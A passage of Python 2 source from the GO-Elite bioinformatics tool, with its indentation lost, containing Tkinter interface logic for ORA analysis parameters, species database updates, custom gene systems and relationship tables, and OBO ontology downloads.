if update_dbs == 'no':
if len(species_codes)==0 or gene_database_dir == '' or len(elite_db_versions)==0: ### No species stored
print_out = "No species databases found. Select\ncontinue to proceed with species download."
IndicatorWindow(print_out,'Continue')
integrate_online_species = 'yes'
addOnlineSpeciesDatabases()
GO_Elite.importGOEliteParameters(['ORA',{}]); sys.exit()
if run_mappfinder == 'yes':
proceed = 'no'; update_dbs = 'no'
while proceed == 'no':
root = Tk();
root.title('GO-Elite: Over-representation Analysis (ORA) Parameters')
gu = GUI(root,option_db,option_group_db['ORA'])
species = gu.Results()['species']
species_code = species_codes[species].SpeciesCode()
permutation = gu.Results()['permutation']
mod = gu.Results()['mod']
try: input_dir = gu.Results()['input_dir']
except KeyError: input_dir = ''
try: denom_dir = gu.Results()['denom_dir']
except KeyError: denom_dir = ''
try: custom_sets_dir = gu.Results()['custom_sets_dir']
except KeyError: custom_sets_dir = ''
try: ORA_algorithm = gu.Results()['ORA_algorithm']
except KeyError: ORA_algorithm = ''
for option in gu.Results(): ### Set options to user selected if error occurs
option_db[option].setDefaultOption(gu.Results()[option])
try:
geneGO_import_dir = '/Databases/'+species_code+'/gene-go'
gg = gene_associations.GrabFiles(); gg.setdirectory(geneGO_import_dir)
filedir,goname = gg.searchdirectory(mod)
except Exception: goname = ''
try:
geneMAPP_import_dir = '/Databases/'+species_code+'/gene-mapp'
gm = gene_associations.GrabFiles(); gm.setdirectory(geneMAPP_import_dir)
filedir,mappname = gm.searchdirectory(mod)
except Exception: mappname = ''
if goname=='' and mappname=='':
print_out = "The primary system (aka MOD) %s is currently unavailable for that species." % mod
IndicatorWindow(print_out,'Continue')
elif len(input_dir)>0 and len(denom_dir)>0:
try:
null = int(permutation)
proceed = 'yes'
except Exception:
print_out = "Invalid numerical permutation entry. Try again."
IndicatorWindow(print_out,'Continue')
input_text_files = readDirText(input_dir)
input_denom_files = readDirText(denom_dir)
if len(input_text_files)>0 and len(input_denom_files)>0: proceed = 'yes'
else:
proceed = 'no'
if len(input_text_files)==0:
print_out = 'No files with the extension ".txt" found in the input directory.'
IndicatorWindow(print_out,'Continue')
else:
print_out = 'No files with the extension ".txt" found in the denominator directory.'
IndicatorWindow(print_out,'Continue')
else:
print_out = "Please designate an input and denominator file directory"
IndicatorWindow(print_out,'Continue')
else:
update_dbs = 'yes' ### Happens when a previous option was selected (or warning) that re-runs this interface to get a specific menu
modifyDBs = run_parameter
if run_from_scratch == 'View Data on Pathways':
root = Tk()
root.title('GO-Elite: Visualize Data on WikiPathways')
gu = GUI(root,'ViewWikiPathways',[])
if update_dbs == 'yes':
if run_parameter == 'skip' or run_parameter == 'intro':
###Update this informatin in option_db which will be over-written after the user selects a species and array_type
root = Tk()
root.title('GO-Elite: Update Options')
#print option_list[i:i+1];kill
gu = GUI(root,option_db,option_group_db['update'])
modifyDBs = gu.Results()['modifyDBs1']
if modifyDBs == 'Create/Modify Databases':
root = Tk(); root.title('GO-Elite: Create/Modify/Update Databases')
gu = GUI(root,option_db,option_group_db['update2'])
modifyDBs = gu.Results()['modifyDBs2']
if modifyDBs == 'Your Own Text Files':
species = '---'
while '--' in species:
root = Tk(); root.title('GO-Elite: Manually Add New Relationships')
gu = GUI(root,option_db,option_group_db['customOptions'])
species = gu.Results()['species_update']
if species == 'New Species':
new_run_parameter = modifyDBs
modifyDBs = 'Add New Species Support'
update_options = ''
else:
species_code = species_codes[species].SpeciesCode()
update_options = gu.Results()['update_options']
current_species_dirs = unique.read_directory('/Databases')
if species_code not in current_species_dirs:
print_out = "Support for this species not downloaded yet. Select\ncontinue to proceed with species download."
IndicatorWindow(print_out,'Continue')
integrate_online_species = 'yes'
addOnlineSpeciesDatabases()
GO_Elite.importGOEliteParameters(['modifyDBs2',{}]); sys.exit()
if update_options == 'Add New Gene System':
new_system_name= ''; new_system_code = ''
while new_system_name == '' or new_system_code =='':
root = Tk(); root.title('GO-Elite: Add New Gene System')
gu = GUI(root,option_db,option_group_db['addCustomSystem'])
new_system_name = gu.Results()['new_system_name']
new_system_code = gu.Results()['new_system_code']
new_mod = gu.Results()['new_mod']
try: gene_system_file = gu.Results()['gene_system_file']
except Exception: gene_system_file = ''
if new_system_code in system_code_db:
if new_system_name == system_code_db[new_system_code]:
print_out = 'The system code and name entered already exist.\nSelect replace to change the "MOD" status.'
fw = FeedbackWindow(print_out,'Replace',"Don't Replace")
choice = fw.ButtonSelection()['button']
if choice != 'Replace': GO_Elite.importGOEliteParameters(modifyDBs); sys.exit()
else:
print_out = 'The system code entered already exists.\nSelect replace to system information.'
fw = FeedbackWindow(print_out,'Replace',"Don't Replace")
choice = fw.ButtonSelection()['button']
if choice != 'Replace': GO_Elite.importGOEliteParameters(modifyDBs); sys.exit()
elif new_system_name in system_codes:
print_out = 'The system name entered already exists.\nSelect replace to system information.'
fw = FeedbackWindow(print_out,'Replace',"Don't Replace")
choice = fw.ButtonSelection()['button']
if choice != 'Replace': GO_Elite.importGOEliteParameters(modifyDBs); sys.exit()
if new_mod == 'yes':
new_mod = 'MOD'
if len(gene_system_file) == 0:
new_system_name = ''; new_system_code = ''
else:
new_mod = ''
if '-' in new_system_name:
print_out = 'The system name contains the invalid character "-".\nPlease change and try again.'
fw = FeedbackWindow(print_out,'Continue',"")
choice = fw.ButtonSelection()['button']
new_system_name=''; new_system_code=''
elif new_system_name == '' or new_system_code =='':
print_out = "No system name or system code specified."
if new_mod == 'MOD':
print_out = "An ID annotation file for this system must be included (required for MODs)"
IndicatorWindow(print_out,'Continue')
### Add new system info
ad = SystemData(new_system_code,new_system_name,new_mod)
system_codes[new_system_name] = ad
exportSystemInfo()
if len(gene_system_file)>0:
root = Tk(); analysis = 'updateAnnotationFiles'
overwrite_annotations = 'yes'
values = gene_system_file,new_system_name,overwrite_annotations,species_code
StatusWindow(root,analysis,values)
GO_Elite.importGOEliteParameters(modifyDBs); sys.exit()
elif update_options == 'Add New Relationship Table':
proceed = 'no'
system_list.sort(); system_list.reverse()
system_list += ['----','Gene Ontology']+ resource_list[1:] + ['New Resource'] ### Add all existing resources to this list
system_list.reverse()
option_db['mod_to_update'].setAnalysisOptions(mod_list)
option_db['system_to_update'].setAnalysisOptions(system_list)
while proceed == 'no':
root = Tk(); root.title('GO-Elite: Add New Relationship Table')
gu = GUI(root,option_db,option_group_db['customRelationships'])
mod_to_update = gu.Results()['mod_to_update']
system_to_update = gu.Results()['system_to_update']
new_resource_name = gu.Results()['new_resource_name']
new_resource_type = gu.Results()['new_resource_type']
try: update_custom_relationship_file = gu.Results()['update_custom_relationship_file']
except Exception: update_custom_relationship_file = ''
overwrite_relationships = 'yes'
relationship_to_update = mod_to_update+'-'+system_to_update
if 'Gene Ontology' in system_to_update:
relationship_to_update = mod_to_update+'-GeneOntology'
relationship_to_update_file ='Databases/'+species_code+'/gene-go/'+relationship_to_update+'.txt'
file_present = verifyFile(relationship_to_update_file)
elif 'Disease Ontology' in system_to_update:
relationship_to_update = mod_to_update+'-CTDOntology'
relationship_to_update_file ='Databases/'+species_code+'/gene-go/'+relationship_to_update+'.txt'
file_present = verifyFile(relationship_to_update_file)
elif 'Phenotype Ontology' in system_to_update:
relationship_to_update = mod_to_update+'-MPhenoOntology'
relationship_to_update_file ='Databases/'+species_code+'/gene-go/'+relationship_to_update+'.txt'
file_present = verifyFile(relationship_to_update_file)
elif 'GOSlim' in system_to_update:
relationship_to_update = mod_to_update+'-GOSlim'
relationship_to_update_file ='Databases/'+species_code+'/gene-go/'+relationship_to_update+'.txt'
file_present = verifyFile(relationship_to_update_file)
elif 'WikiPathways' in system_to_update:
relationship_to_update = mod_to_update+'-MAPP'
relationship_to_update_file ='Databases/'+species_code+'/gene-mapp/'+relationship_to_update+'.txt'
file_present = verifyFile(relationship_to_update_file)
elif 'miRNA Targets' in system_to_update:
relationship_to_update = mod_to_update+'-microRNATargets'
relationship_to_update_file ='Databases/'+species_code+'/gene-mapp/'+relationship_to_update+'.txt'
file_present = verifyFile(relationship_to_update_file)
elif 'BioMarkers' in system_to_update:
relationship_to_update = mod_to_update+'-BioMarkers'
relationship_to_update_file ='Databases/'+species_code+'/gene-mapp/'+relationship_to_update+'.txt'
file_present = verifyFile(relationship_to_update_file)
elif 'Domains' in system_to_update:
relationship_to_update = mod_to_update+'-Domains'
relationship_to_update_file ='Databases/'+species_code+'/gene-mapp/'+relationship_to_update+'.txt'
file_present = verifyFile(relationship_to_update_file)
elif 'PathwayCommons' in system_to_update:
relationship_to_update = mod_to_update+'-PathwayCommons'
relationship_to_update_file ='Databases/'+species_code+'/gene-mapp/'+relationship_to_update+'.txt'
file_present = verifyFile(relationship_to_update_file)
elif 'KEGG' in system_to_update:
relationship_to_update = mod_to_update+'-KEGG'
relationship_to_update_file ='Databases/'+species_code+'/gene-mapp/'+relationship_to_update+'.txt'
file_present = verifyFile(relationship_to_update_file)
elif 'Transcription Factor Targets' in system_to_update:
relationship_to_update = mod_to_update+'-TFTargets'
relationship_to_update_file ='Databases/'+species_code+'/gene-mapp/'+relationship_to_update+'.txt'
file_present = verifyFile(relationship_to_update_file)
elif 'New Resource' in system_to_update:
relationship_to_update = mod_to_update+'-'+new_resource_name
if new_resource_type == 'Ontology':
relationship_to_update_file ='Databases/'+species_code+'/gene-go/'+relationship_to_update+'.txt'
else:
relationship_to_update_file ='Databases/'+species_code+'/gene-mapp/'+relationship_to_update+'.txt'
file_present = verifyFile(relationship_to_update_file)
else:
relationship_to_update_file ='Databases/'+species_code+'/uid-gene/'+relationship_to_update+'.txt'
file_present = verifyFile(relationship_to_update_file)
if file_present == 'yes':
print_out = 'The relationship table already exists. Only\nuse this menu to add new tables and use the\n"Update Existing Relationship Table" to update\nexisting relationships.'
IndicatorWindow(print_out,'Continue'); GO_Elite.importGOEliteParameters(modifyDBs); sys.exit()
elif (mod_to_update != system_to_update) and ('----' not in system_to_update):
root = Tk(); analysis = 'updateRelationshipFiles'
values = update_custom_relationship_file,relationship_to_update_file,overwrite_relationships,species_code
StatusWindow(root,analysis,values)
proceed = 'yes'
GO_Elite.importGOEliteParameters(modifyDBs); sys.exit()
elif update_options == 'Update Existing Relationship Table':
import_dir1 = '/Databases/'+species_code+'/uid-gene'
import_dir2 = '/Databases/'+species_code+'/gene-mapp'
import_dir3 = '/Databases/'+species_code+'/gene-go'
#import_dir4 = '/Databases/'+species_code+'/gene'
proceed = 'yes'; systems_not_present = []
try: uid_gene_list = read_directory(import_dir1); uid_gene_list.sort()
except Exception: proceed = 'no'; systems_not_present.append('uid-gene'); uid_gene_list = []
try: gene_mapp_list = read_directory(import_dir2); gene_mapp_list.sort()
except Exception: systems_not_present.append('gene-mapp'); gene_mapp_list=[]
try: gene_go_list = read_directory(import_dir3); gene_go_list.sort()
except Exception: systems_not_present.append('gene-go'); gene_go_list=[]
#try: gene_list = read_directory(import_dir4); gene_list.sort()
#except Exception: proceed = 'no'; systems_not_present.append('gene')
if len(gene_go_list) == 1 and 'Ensembl_version.txt' in gene_go_list: gene_go_list=[]
#if len(gene_list) == 0: proceed = 'no'; systems_not_present.append('gene')
elif len(uid_gene_list) == 0: proceed = 'no'; systems_not_present.append('uid-gene')
elif len(gene_mapp_list) == 0 and len(gene_go_list) == 0: proceed = 'no'; systems_not_present.append('gene-mapp'); systems_not_present.append('gene-go')
if (proceed == 'no') or ('gene-mapp' in systems_not_present and 'gene-go' in systems_not_present):
print_out = "Please note: The species directory does not appear\nto have a valid %s table(s). You may need to add before proceeding." % str(systems_not_present)[1:-1]
IndicatorWindow(print_out,'Continue')
#GO_Elite.importGOEliteParameters('skip'); sys.exit()
relationship_dir = gene_go_list+['----']+gene_mapp_list+['----']+uid_gene_list#+['----']+gene_list
relationship_files=[]
for i in relationship_dir:
if '-' in i: relationship_files.append(string.replace(i,'.txt',''))
option_db['relationship_to_update'].setAnalysisOptions(relationship_files)
root = Tk(); root.title('GO-Elite: Update Existing Relationship Table')
gu = GUI(root,option_db,option_group_db['customUpdate'])
relationship_to_update = gu.Results()['relationship_to_update']
update_relationship_file = gu.Results()['update_relationship_file']
overwrite_relationships = gu.Results()['overwrite_relationships']
if relationship_to_update != '----':
file = relationship_to_update+'.txt'
if file in gene_mapp_list:
relationship_to_update = 'Databases/'+species_code+'/gene-mapp/'+relationship_to_update+'.txt'
elif file in gene_go_list:
relationship_to_update = 'Databases/'+species_code+'/gene-go/'+relationship_to_update+'.txt'
root = Tk(); analysis = 'updateRelationshipFiles'
values = update_relationship_file,relationship_to_update,overwrite_relationships,species_code
StatusWindow(root,analysis,values)
elif modifyDBs == 'Manually Add New Relationships':
print_out = "Please Install a Species Database or Add New Species Support"
IndicatorWindow(print_out,'Continue')
GO_Elite.importGOEliteParameters('skip'); sys.exit()
if modifyDBs == 'EntrezGene-GO Associations':
if len(species_codes)>0:
species = '---'
while '--' in species:
root = Tk(); root.title('GO-Elite: EntrezGene-GO Update Options')
gu = GUI(root,option_db,option_group_db['updateEntrezGO'])
species = gu.Results()['species_eg_update']; compatible_mods = []
try: species_code = [species_codes[species].SpeciesCode()]
except KeyError: species_code = '--'
download_entrez_go = gu.Results()['download_entrez_go']
incorporate_previous_associations_EG = gu.Results()['incorporate_previous_associations_EG']
if incorporate_previous_associations_EG == 'update previous relationships':
rewrite_existing_EG = 'no'
else: rewrite_existing_EG = 'yes'
#overwrite_entrezgo = gu.Results()['overwrite_entrezgo']
overwrite_entrezgo = 'over-write previous databases' ### Don't include this option... save to NewDatabases
remove_download_files = gu.Results()['delete_entrezgo']
status = ''
if species_code != '----' and species != 'New Species' and species != 'all-supported':
taxid = species_codes[species].TaxID()
#species = 'New Species' ### Must designate a taxid
compatible_mods = species_codes[species].Systems()
if species == 'New Species':
new_run_parameter = modifyDBs
modifyDBs = 'Add New Species Support'; species=''
if species == 'all-supported':
tax_ids=[]; species_code = []
for species in species_codes:
taxid = species_codes[species].TaxID(); tax_ids.append(taxid)
sp_code = species_codes[species].SpeciesCode(); species_code.append(sp_code)
elif len(species)>1: tax_ids = [species_codes[species].TaxID()]
if modifyDBs != 'Add New Species Support':
if download_entrez_go == 'yes':
root = Tk(); analysis = 'DownloadEntrezGO'
values = ncbi_go_file,'BuildDBs/Entrez/Gene2GO/','txt',tax_ids,species_code,overwrite_entrezgo, rewrite_existing_EG
StatusWindow(root,analysis,values)
root = Tk(); analysis = 'EntrezGOExport'
values = tax_ids,species_code,status,option_db,option_group_db['gene2go_not_found'],overwrite_entrezgo, rewrite_existing_EG
StatusWindow(root,analysis,values)
else:
print_out = "Please Install a Species Database or or Add New Species Support"
IndicatorWindow(print_out,'Continue')
GO_Elite.importGOEliteParameters(modifyDBs); sys.exit()
if modifyDBs == 'Download Species Databases':
integrate_online_species = 'yes'
addOnlineSpeciesDatabases()
GO_Elite.importGOEliteParameters('skip'); sys.exit()
if modifyDBs == 'Ensembl Associations':
print_out = "This menu is intended to download and integrate Ensembl\nrelationships from versions and species NOT supported\nby GO-Elite. Current GO-Elite databases already contains\nall relationships for supported species and versions."
IndicatorWindow(print_out,'Continue')
global process_Ens_go
### Download Ensembl Species Information from FTP Server
root = Tk(); analysis = 'getCurrentEnsemblSpecies'
values = None
StatusWindow(root,analysis,values)
option_db['species_ensembl_update'].setAnalysisOptions(ensembl_species)
option_db['ensembl_version'].setAnalysisOptions(ensembl_versions)
root = Tk(); root.title('GO-Elite: Extract Relationships from Online Ensembl Databases')
gu = GUI(root,option_db,option_group_db['updateEnsemblSQL'])
species = gu.Results()['species_ensembl_update']
ensembl_version = gu.Results()['ensembl_version']
try: species_code = species_codes[species].SpeciesCode()
except KeyError: species_code = '--'
incorporate_previous_ensembl_associations = gu.Results()['incorporate_previous_ensembl_associations']
if incorporate_previous_ensembl_associations == 'update previous relationships': rewrite_existing = 'no'
else: rewrite_existing = 'yes'
#overwrite_ensembl = gu.Results()['overwrite_ensembl']
overwrite_ensembl = 'over-write previous databases' ### Don't include this option... save to NewDatabases
remove_download_files = gu.Results()['delete_ensembl']
force = gu.Results()['download_latest_ensembl_files']
### Add species information to database
if species_code == '--':
genus,species_code = string.split(species,' '); species_code = genus[0]+species_code[0]
species_taxid = '' ### Ideally should have but can assign when updating EntrezGene directly
compatible_mods = ['En']
sd = SpeciesData(species_code,species,compatible_mods,species_taxid)
species_codes[species] = sd
exportSpeciesInfo(species_codes)
root = Tk(); analysis = 'getVersionedEnsExternalDB'
values = species,ensembl_version
StatusWindow(root,analysis,values)
external_dbs, external_system, array_systems, external_ids = importExternalDBs(species)
option_db['include_ens1'].setAnalysisOptions(external_dbs)
option_db['include_ens2'].setAnalysisOptions(external_dbs)
option_db['include_ens3'].setAnalysisOptions(external_dbs)
option_db['include_ens4'].setAnalysisOptions(external_dbs)
option_db['include_ens5'].setAnalysisOptions(external_dbs)
root = Tk(); root.title('GO-Elite: Extract Relationships from Online Ensembl Databases')
gu = GUI(root,option_db,option_group_db['updateEnsemblSQL2'])
include_ens1 = gu.Results()['include_ens1']
include_ens2 = gu.Results()['include_ens2']
include_ens3 = gu.Results()['include_ens3']
include_ens4 = gu.Results()['include_ens4']
include_ens5 = gu.Results()['include_ens5']
process_Ens_go = gu.Results()['process_Ens_go']
externalDBName_list = [include_ens1,include_ens2,include_ens3,include_ens4,include_ens5]
if species_code == 'Hs' or species_code == 'Mm' or species_code == 'Rn':
for id in externalDBName_list:
if id in array_db:
print_out = "Attention: Integrating array information for\nthis species will increase download time and will\nrequire > 2GB of hard-drive space. Please confirm\nbefore continuing."
IndicatorWindow(print_out,'Continue')
root = Tk(); analysis = 'EnsemblSQLImport'
values = species_code,species,child_dirs,externalDBName_list,overwrite_ensembl,rewrite_existing,force,ensembl_version,external_system
for external_db in externalDBName_list:
if len(external_db)>1:
syscode = external_system[external_db]
if syscode not in system_code_db:
ad = SystemData(syscode,external_db,'')
system_codes[external_db] = ad
system_code_db[ad.SystemCode()]= external_db
exportSystemInfo()
StatusWindow(root,analysis,values)
if 'WikiPathways' in modifyDBs or 'Affymetrix Annotation files' in modifyDBs:
if 'Affymetrix Annotation files' in modifyDBs:
print_out = "This menu is intended to integrate the most recent\n"
print_out+= "downloaded Affymetrix CSV annotation file relationships.\n"
print_out+= "However, all supported Affymetrix species CSV annotation\n"
print_out+= " files relationships are present in the downloadable databases \n"
print_out+= "from GO-Elite (e.g., EnsMart56Plus - where Plus indicates\n"
print_out+= "the addition of Affymetrix CSV relationships in addition to\nthose from Ensembl)."
IndicatorWindow(print_out,'Continue')
try: option_db['species_affy_update'].setAnalysisOptions(species_list_augmented)
except IOError: null = []
if 'WikiPathways' in modifyDBs: title = 'GO-Elite: WikiPathways Update'
else: title = 'GO-Elite: Affymetrix Annotation Update'
if modifyDBs == 'Affymetrix Annotation files': analysis_option = 'updateAffyCSV'
else: analysis_option = 'WikiPathways'
species = '---'
while '--' in species:
root = Tk(); root.title(title)
gu = GUI(root,option_db,option_group_db[analysis_option])
species = gu.Results()['species_affy_update']
if modifyDBs == 'Affymetrix Annotation files':
process_go = gu.Results()['process_go']
parse_genesets = 'no' #gu.Results()['parse_genesets']
integrate_affy_associations = 'yes'
#else: process_go = 'no'; parse_genesets = 'yes'; integrate_affy_associations = 'no'
#overwrite_affycsv = gu.Results()['overwrite_affycsv']
overwrite_affycsv = 'over-write previous databases' ### Don't include this option... save to NewDatabases
try: incorporate_previous_associations = gu.Results()['incorporate_previous_associations']
except KeyError: incorporate_previous_associations = gu.Results()['incorporate_previous_associations_WP']
try: get_mapped_file_version = gu.Results()['get_mapped_file_version']
except KeyError: get_mapped_file_version = ''
if incorporate_previous_associations == 'update previous relationships':
incorporate_previous_associations = 'yes'
else: incorporate_previous_associations = 'no'
if species == 'all-supported':
species=[]; species_code = []
for sp in species_codes:
species.append(sp)
sp_code = species_codes[sp].SpeciesCode(); species_code.append(sp_code)
elif species == 'New Species':
new_run_parameter = modifyDBs
modifyDBs = 'Add New Species Support'
elif species == '----':
print_out = 'Please select a valid species.'
IndicatorWindow(print_out,'Continue')
GO_Elite.importGOEliteParameters(modifyDBs); sys.exit()
else:
species_code = [species_codes[species].SpeciesCode()]
species = [species]
annotation_files_present = 'no'
if modifyDBs != 'Add New Species Support':
while annotation_files_present == 'no':
try: import_dir = '/BuildDBs/Affymetrix/'+species_code[0]
except Exception:
print_out = "Please Install a Species Database or Aor Add New Species Support"
IndicatorWindow(print_out,'Continue')
GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
try: dir_list = read_directory(import_dir) #send a sub_directory to a function to identify all files in a directory
except Exception: ### Occurs if species dir not found
dir_list = []
for affy_data in dir_list: #loop through each file in the directory to output results
affy_data_dir = import_dir[1:]+'/'+affy_data
if '.csv' in affy_data_dir: annotation_files_present = 'yes'
#meta_file_present = verifyFile('Databases/'+species[0]+'/'+'uid-gene/Ensembl_EntrezGene-meta.txt')
if modifyDBs == 'WikiPathways': annotation_files_present = 'yes' # and meta_file_present == 'yes'
elif annotation_files_present == 'no':
print_out = "No Affymetrix annotation files found in the directory:\n"+osfilepath(import_dir[1:])
print_out += "\n\nAtleast one CSV file is needed to parse Affymetrix gene relationships and subsequently"
print_out += "\nprocess WikiPathway relationships.\n\nPress Continue to select a folder containing CSV file(s) from your computer."
IndicatorWindow(print_out,'Continue'); assinged = 'no'
while assinged == 'no':
root = Tk()
root.title('GO-Elite: Select Affymetrix Annotation File(s)')
gu = GUI(root,option_db,option_group_db['InputAnnotationFolder'])
input_annotation_dir = gu.Results()['input_annotation_dir'] + '/'
dir_list = read_directory(input_annotation_dir)
for input_annotation_file in dir_list:
input_annotation_file = input_annotation_dir+input_annotation_file
input_annotation_lower = string.lower(input_annotation_file)
if '.csv' in input_annotation_lower:
assinged = 'yes'
###Thus the CSV was confirmed, so copy it over to BuildDB
icf_list = string.split(input_annotation_file,'/'); csv_short = icf_list[-1]
destination_parent = import_dir[1:]+'/'
info_list = input_annotation_file,osfilepath(destination_parent+csv_short)
StatusWindow(Tk(),'copy',info_list)
root = Tk(); analysis = 'AffyCSV'
values = system_codes,species_code,species,incorporate_previous_associations,process_go,parse_genesets,integrate_affy_associations,overwrite_affycsv,get_mapped_file_version
StatusWindow(root,analysis,values)
if modifyDBs == 'Add New Species Support':
root = Tk(); root.title('GO-Elite: Add New Species Support')
gu = GUI(root,option_db,option_group_db['NewSpecies'])
species_code = gu.Results()['new_species_code']
try: dbase_version = gu.Results()['dbase_version']; exportDBversion(db_version)
except Exception: null = []
new_species_name = gu.Results()['new_species_name']
species_taxid = gu.Results()['species_taxid']
compatible_mods =[]
if species_code in species_code_db:
if new_species_name == species_code_db[species_code]:
print_out = 'The species code and name entered already exist.\nSelect replace to add/change the taxid.'
fw = FeedbackWindow(print_out,'Replace',"Don't Replace")
choice = fw.ButtonSelection()['button']
if choice != 'Replace': GO_Elite.importGOEliteParameters(new_run_parameter); sys.exit()
else:
print_out = 'The species code entered already exists.\nSelect replace to change system information.'
fw = FeedbackWindow(print_out,'Replace',"Don't Replace")
choice = fw.ButtonSelection()['button']
if choice != 'Replace': GO_Elite.importGOEliteParameters(new_run_parameter); sys.exit()
elif new_species_name in species_codes:
print_out = 'The species name entered already exists.\nSelect replace to change system information.'
fw = FeedbackWindow(print_out,'Replace',"Don't Replace")
choice = fw.ButtonSelection()['button']
if choice != 'Replace': GO_Elite.importGOEliteParameters(new_run_parameter); sys.exit()
sd = SpeciesData(species_code,new_species_name,compatible_mods,species_taxid)
species_codes[new_species_name] = sd
exportSpeciesInfo(species_codes)
current_species_dirs = unique.read_directory('/Databases')
if len(current_species_dirs) == 0:
### Hence no official database has been added yet and adding a novel species
new_dir = 'Databases/EnsMart00/'+species_code
export.createExportFolder(new_dir) ### Create a species directory
export.createExportFolder(new_dir+'/gene') ### Add default directories
export.createExportFolder(new_dir+'/gene-go') ### Add default directories
export.createExportFolder(new_dir+'/uid-gene') ### Add default directories
export.createExportFolder(new_dir+'/gene-mapp') ### Add default directories
exportDBversion('EnsMart00')
else:
### An EnsMart directory thus exists
new_dir = 'Databases/'+species_code
try: export.createExportFolder(new_dir) ###Re-Create directory if deleted
except Exception: null=[]
### Indicate that support for this species is now added
print_out = new_species_name+" succesfully added to database. Proceed\nwith addition of ID systems and relationships."
ProcessCompletedWindow(print_out,'Process Completed')
GO_Elite.importGOEliteParameters(new_run_parameter); sys.exit()
if modifyDBs == 'Ontology structure':
print_out = 'This menu is intended to download Ontology Structure annotations\nthat are NOT SUPPORTED from the "Database Species Download" menu.\nHowever, if you would like to get the very most recent files, proceed.'
IndicatorWindow(print_out,'Continue')
root = Tk(); root.title('GO-Elite: Update Options')
gu = GUI(root,option_db,option_group_db['updateOBO'])
OBO_url = gu.Results()['OBO_url']
update_OBO = 'yes' #gu.Results()['update_OBO']
root = Tk(); analysis = 'UpdateOBO'
values = file_location_defaults,update_OBO,OBO_url
StatusWindow(root,analysis,values)
if modifyDBs == 'Additional Resources':
### Allow update of any supported resource (e.g., Ontologies, WikiPathways)
current_species_dirs = unique.read_directory('/Databases')
if len(current_species_dirs) == 0 or 'EnsMart' in current_species_dirs[0]: ### Either no species present or problem with the current config
print_out = "No species support currently found. Select\ncontinue to proceed with species download."
IndicatorWindow(print_out,'Continue')
integrate_online_species = 'yes'
addOnlineSpeciesDatabases()
GO_Elite.importGOEliteParameters(['modifyDBs2',{}]); sys.exit()
option_db['resource_to_update'].setAnalysisOptions(resource_list)
root = Tk(); root.title('GO-Elite: Resource Update Options')
gu = GUI(root,option_db,option_group_db['AdditionalResources'])
species = gu.Results()['species_resources']
additional_resources = gu.Results()['resource_to_update']
species_code = species_codes[species].SpeciesCode()
current_species_dirs = unique.read_directory('/Databases')
root = Tk(); analysis = 'getAdditionalOnlineResources'
values = species_code,additional_resources
StatusWindow(root,analysis,values)
if update_dbs == 'no':
proceed = 'no'
while proceed == 'no':
try: all_species_codes = [species_code]
except Exception:
all_species_codes=[]
for species in current_species_names:
all_species_codes.append(species_codes[species].SpeciesCode())
for species_code in all_species_codes:
### Augment the default resources to filter with others present
default_resources = option_db['resources_to_analyze'].AnalysisOptions()
#print option_db['species'].setAnalysisOptions(current_species_names)
import_dir1 = '/Databases/'+species_code+'/gene-mapp'
import_dir2 = '/Databases/'+species_code+'/gene-go'
try:
gene_mapp_list = read_directory(import_dir1)
gene_mapp_list.sort()
for file in gene_mapp_list:
resource = string.split(file,'-')[-1][:-4]
if resource != 'MAPP' and resource not in default_resources and '.txt' in file:
default_resources.append(resource)
except Exception: null=[]
try:
gene_go_list = read_directory(import_dir2)
gene_go_list.sort()
for file in gene_go_list:
resource = string.split(file,'-')[-1][:-4]
if resource != 'GeneOntology' and resource not in default_resources and 'version' not in resource and '.txt' in file:
default_resources.append(resource)
except Exception: null=[]
option_db['resources_to_analyze'].setAnalysisOptions(default_resources)
root = Tk(); root.title('GO-Elite: Redundancy Filtering Options')
gu = GUI(root,option_db,option_group_db['elite'])
z_threshold = gu.Results()['z_threshold']
resources_to_analyze = gu.Results()['resources_to_analyze']
p_val_threshold = gu.Results()['p_val_threshold']
#include_headers_in_output = gu.Results()['include_headers_in_output']
filter_method = gu.Results()['filter_method']
try:
returnPathways = gu.Results()['returnPathways']
if returnPathways == 'no': returnPathways = None
except Exception: returnPathways = None
try: output_dir = gu.Results()['output_dir']
except KeyError: output_dir = ''
try: input_dir = gu.Results()['mappfinder_dir']
except KeyError: null = ''
if len(input_dir)>0 and len(output_dir)==0:
print_out = "Please select an output directory."
IndicatorWindow(print_out,'Continue')
else:
try:
change_threshold = int(gu.Results()['change_threshold'])-1
null = float(z_threshold)
null = float(p_val_threshold)
proceed = 'yes'
except Exception:
print_out = "Invalid numerical entry. Try again."
IndicatorWindow(print_out,'Continue')
try:
max_member_count = int(gu.Results()['max_member_count'])
if max_member_count < 1: max_member_count = 10000
except Exception: null=[]
except AttributeError,e:
print 'Uknown error encountered... GO-Elite is exiting'
print_out = e; "Unknown User Interface Error Encoutered"
WarningWindow(print_out,print_out); root.destroy(); sys.exit()
file_dirs = input_dir, denom_dir, output_dir, custom_sets_dir
if ORA_algorithm == 'Fisher Exact Test':
permutation = 'FisherExactTest'
else:
try: permutation = int(permutation)
except Exception: null=[]
return species, run_mappfinder, mod, permutation, filter_method, z_threshold, p_val_threshold, change_threshold, resources_to_analyze, max_member_count, returnPathways, file_dirs
def verifyFile(filename):
fn=filepath(filename); file_found = 'yes'
try:
for line in open(fn,'rU').xreadlines():break
except Exception: file_found = 'no'
return file_found
def importResourceList():
filename = 'Config/resource_list.txt'
fn=filepath(filename); resource_list=[]
for line in open(fn,'rU').readlines():
data = cleanUpLine(line)
resource = data
resource_list.append(resource)
return resource_list
def updateOBOfiles(file_location_defaults,update_OBO,OBO_url,root):
run_parameter = "Create/Modify Databases"
if update_OBO == 'yes':
import OBO_import
c = OBO_import.GrabFiles()
c.setdirectory('/OBO'); file_dirs = c.searchdirectory('.ontology')+c.searchdirectory('.obo')
if len(OBO_url)>0: obo = OBO_url
else: ### If not present, get the gene-ontology default OBO file
obo = file_location_defaults['OBO'].Location()
fln,status = update.download(obo,'OBO/','')
run_parameter='Create/Modify Databases'
if 'Internet' not in status:
OBO_import.moveOntologyToArchiveDir()
print_out = 'Finished downloading the latest Ontology OBO files.'
print print_out
try: system_codes,source_types,mod_types = GO_Elite.getSourceData()
except Exception: null=[]
if root !='' and root !=None:
InfoWindow(print_out,'Update Complete!')
continue_to_next_win = Button(text = 'Continue', command = root.destroy)
continue_to_next_win.pack(side = 'right', padx = 10, pady = 10); root.mainloop()
GO_Elite.importGOEliteParameters(run_parameter); sys.exit()
else: null=[]
else:
if root !='' and root !=None: WarningWindow(status,'Error Encountered!'); root.destroy(); GO_Elite.importGOEliteParameters(run_parameter); sys.exit()
else: print status
else:
print_out = 'Download Aborted.'
